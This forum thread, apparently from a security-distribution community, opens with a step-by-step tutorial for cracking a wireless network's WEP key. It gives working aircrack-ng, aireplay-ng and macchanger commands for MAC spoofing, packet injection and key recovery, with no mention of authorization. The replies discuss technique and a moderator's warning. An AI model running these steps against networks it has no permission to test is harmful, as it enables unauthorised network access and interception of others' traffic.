Page 1 of 3 123 LastLast
Results 1 to 10 of 27

Thread: WiFi Hacking 101

  1. #1
    Just burned his ISO
    Join Date
    Nov 2008
    Posts
    7

    Default WiFi Hacking 101

    O.K folks, in this tut i am going to show you how to crack wep, Sniff non ssl & some ssl passwords over a wireless network & sniffing msn chats

    Part. 1, Cracking WEP

    my way of cracking wep is a little different than other ways but it gets the job done quicker than everyone else's way

    so you will need backtrack 3 and a supported wifi card that can go into monitor mode (i have a ranlink 2500 card (ra0) )

    open up a shell

    ok so 1st we need to stop our wireless card so we do the airmon command

    airmon-ng stop [wifi card extension e.g ath0]

    now lets change our mac address

    macchanger --mac 00:11:22:33:44:55 [wifi card extension]

    now lets fire our card up in monitor mode

    airmon-ng start [wifi card extension]

    now we need the mac address of the AP we are hacking so lets do

    airodump-ng [wifi card extension] now you will see your AP. Take note of the mac address/ BSSID and the channel, now hit CTRL+C to stop airodump jumping channels or you will come into problems later on.

    now lets start capturing the data packets we need for the hack so type

    airodump-ng -c [channel] -b [bssid/ mac addres of AP] -w [filename] [wifi card extension] so for example

    airodump-ng -c 1 -b 01:1b:11:78:d9:f2 -w linksys ra0

    once you have done that command you should see some info come up clients, mac address, channel, data ect now you should see the data filling up we need the data to get to about 10-15 thousand to crack the key so we need to speed it up we get a lot of data in a short space of time.

    we are now going to use aireplay so open up another shell and type aireplay-ng -1 -0 -a [AP mac address/ bssid] -h [faked mac address] [wifi card extension] for example

    aireplay-ng -1 0 -a 02:1b:11:78:d9:f2 -h 00:11:22:33:44:55 ra0

    now once you see authentication successful proceed to replay a data packet to the access point which will force it to send out lots of packets we can use to crack the key so do,

    aireplay-ng -3 -p 0841 -c FF:FF:FF:FF:FF:FF -b [ap mac address/ bssid] -h [faked mac address] [wifi card extension] for example

    aireplay-ng -3 -p 0841 -c FF:FF:FF:FF:FF:FF -b 02:1b:11:78:d9:f2 -h 00:11:22:33:44:55 ra0

    now aireplay will start reading the packets and once it finds one you can use for the hack it will prompt you to use that packet? just hit y then enter now on the airodump shell you will see the data filling up very fast ance it gets to 10,000 run this command:

    aircrack-ng -b [mac address/ bssid] [file name you used earlier +-01.cap] for example

    aircrack-ng -b 02:1b:11:78:d9:f2 linksys-01.cap

    and aircrack will start decrypting the packets/ IV's and find the wep key!

    if this is your first time doing wep cracking it should take about 10-20 mins at first and you will start progressing to 8 mins, 5 mins, 3 mins ect

    other tuts to follow! [[its 03:45am in the uk :O]]

    thanks for reading!!

    will also get some screen shots up tomorrow.

  2. #2
    Very good friend of the forum Virchanza's Avatar
    Join Date
    Jan 2010
    Posts
    863

    Default

    now once you see authenication sucessful proceed to replay a data packet to the access point
    I set it replaying before I do fake associations, I don't wanna miss any ARP's.
    Ask questions on the open forums, that way everybody benefits from the solution, and everybody can be corrected when they make mistakes. Don't send me private messages asking questions that should be asked on the open forums, I won't respond. I decline all "Friend Requests".

  3. #3
    fastboi
    Guest

    Default

    Quote Originally Posted by -wOne View Post
    airodump-ng [wifi card extension] now you will see the ************************************************** ***************
    I think this part gonna create some fuss..... But other than that seems ok i guess. I just don't get how this guide is faster than other ones? Also there are so many similar guides, so why reinvent the wheel?

    Edit: In my opinion, the fastest way is wesside-ng or spoonwep

  4. #4
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Default

    Quote Originally Posted by -wOne View Post
    my way of cracking wep is a little different than other ways but it gets the job done quicker than everyone else's way.
    I have a hard time figuring out how this tutorial/method differs from any of the other tutorials out there and which part it is that would make it superior to them, apart from perhaps using the frame control option which is not specifically mentioned in many tutorials. Other than that it seems like a solid write-up on one of the most basic attacks (ARP-replay) available in aireplay-ng.
    -Monkeys are like nature's humans.

  5. #5
    Member imported_Deathray's Avatar
    Join Date
    Oct 2007
    Posts
    381

    Default

    Quote Originally Posted by Virchanza View Post
    I set it replaying before I do fake associations, I don't wanna miss any ARP's.
    Why have I never thought of that before?
    In every single WEP tutorial I have read I have never stumbled upon anyone that said to start replaying before the association. Does that really work? Does a fake association really generate arp packet's on the network?
    If so that would really speed up the process if no clients are connected.
    - Poul Wittig

  6. #6
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    I have edited the post and let the OP of with a warning on his discussion of illegal behavior because it was a borderline offense. What bothers me more is the lack of people using spell check on their posts so I have spell checked the original post and I would encourage people to use spell check and not use l33t speak or whatever the F**k its called if you want a intelligent response from any of the senior members here.

  7. #7
    Senior Member streaker69's Avatar
    Join Date
    Jan 2010
    Location
    Virginville, BlueBall, Bird In Hand, Intercourse, Paradise, PA
    Posts
    3,535

    Default

    Although the formatting is acceptable, I suggest that anyone that's including embedded commands inside of text, use the 'code' tags around those commands. It just makes it easier to read and follow.

    ...and the Shift key was invented for a reason.
    A third party security audit is the IT equivalent of a colonoscopy. It's long, intrusive, very uncomfortable, and when it's done, you'll have seen things you really didn't want to see, and you'll never forget that you've had one.

  8. #8
    Senior Member ShadowKill's Avatar
    Join Date
    Dec 2007
    Posts
    908

    Default

    Quote Originally Posted by pureh@te View Post
    I have edited the post and let the OP of with a warning on his discussion of illegal behavior because it was a borderline offense. What bothers me more is the lack of people using spell check on their posts so I have spell checked the original post and I would encourage people to use spell check and not use l33t speak or whatever the F**k its called if you want a intelligent response from any of the senior members here.
    Gotcha! Put the stick away, you know I <3 you....



    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill

  9. #9
    Just burned his ISO
    Join Date
    Mar 2008
    Posts
    21

    Default

    Now Now ShadowKill you have to note Pureh@te did say "spell check" not grammar check :P

    So with that pointed out ...... Did you really get him ?

  10. #10
    Senior Member ShadowKill's Avatar
    Join Date
    Dec 2007
    Posts
    908

    Default

    Quote Originally Posted by krymsunmortis View Post
    Now Now ShadowKill you have to note Pureh@te did say "spell check" not grammar check :P

    So with that pointed out ...... Did you really get him ?
    Yes....yes I did. Perhaps not on the application of the word an, but most definitely on the misspelling of off. Need directions to Merriam's?



    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill

Page 1 of 3 123 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •